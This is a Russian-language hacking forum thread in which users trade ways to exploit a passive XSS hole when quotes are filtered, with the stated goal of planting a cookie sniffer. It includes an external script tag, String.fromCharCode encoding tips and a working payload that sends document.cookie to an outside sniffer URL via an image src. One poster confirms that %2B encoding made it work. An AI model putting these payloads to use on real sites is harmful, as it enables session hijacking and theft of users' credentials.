Одинарный ковычки тоже фильтруютя?

__________________
Никому нельзя верить...

Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

А во вторых попробуй использовать String.fromCharCode
(encoder http://www.paulschou.com/tools/xlate/)

__________________
Full DNS report

Ковычки могут понадобиться для того чтоб закрыть тег =)

Автор поясни какого типа XSS актив пасив мыло форум и т.д

Вариант со внедрением ява-скрипта не подходит, как я и написал выше.
Инъекция пассивная, одинарные фильтруются. Нужно внедрить адрес снифера. То, что знаю я - осуществляется через кавычки, поэтому прошу совета.

а просто тыги можешь использовать?...
ну например картинку вставить?...
а далее можешь проверить:
Как дальше использовать думаю разберешься...

Гм, аналогичная ситуация - пассивный Xss, фильтруется только ", '... Что можно сделать нехорошего без кавычек? :-)
Т.е. просто картинку вставить могу - там кавычки не нужны, а вот с запросом О_о...

r=<img%20src=http://antichat.ru/cgi-bin/s.jpg?><script>img%20=%20new%20Image();%20img.src% 20=%20document.images[19].src+document.cookie;</script>
К примеру не подходит

А, все, доперло - "+" = " "... как от этого избавиться? :-) & нельзя использовать, сразу говорю.

В виде "%ХХ" как "+" выглядит?

UPD: усе, спасибо, нашел :-) %2B - все работает

так как запрос без кавычек выглядит?